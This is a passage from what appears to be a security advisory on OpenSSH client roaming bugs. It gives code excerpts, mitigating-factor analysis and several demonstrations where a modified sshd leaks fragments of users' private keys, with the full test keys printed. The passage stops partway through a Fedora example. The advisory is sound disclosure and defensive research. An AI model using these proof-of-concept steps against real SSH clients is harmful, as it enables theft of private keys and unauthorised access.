In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme
Private Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key
$ head -n 1 /etc/motd FreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013
$ /usr/bin/ssh -V OpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= -----END DSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:768" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-9448bb7f/infoleak
MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To ...
env ROAMING="client_out_buf_size:1024" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-279f5e2b/infoleak
... iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= ...
Private Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013
$ /usr/bin/ssh -V OpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:2048" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-35ee7ab0/infoleak
MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-6cb31d82/infoleak
... uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=
Private Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
$ /usr/bin/ssh -V OpenSSH_7.0, LibreSSL 2.2.2
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8 L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19 qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg== -----END RSA PRIVATE KEY-----
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1 [connection suspended, press return to resume]Segmentation fault (core dumped)
(this example requires a ProxyCommand because of the NULL-aitop bug described in the Mitigating Factors of the Information Leak section, and crashes because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section)
cat /tmp/roaming-a5eca355/infoleak
ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
Private Key Disclosure example: CentOS 7, 1024-bit DSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="CentOS Linux 7 (Core)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2 hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4= -----END DSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-b7b16dfc/infoleak
jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
strings /tmp/roaming-b324ce87/infoleak
IuQL R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9v
strings /tmp/roaming-24011739/infoleak
KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
strings /tmp/roaming-37456846/infoleak
LsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA yq4Kwj/
strings /tmp/roaming-988ff54c/infoleak
GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
strings /tmp/roaming-53887fa5/infoleak
/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4
Private Key Disclosure example: Fedora 20, 2048-bit RSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Fedora 20 (Heisenbug)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
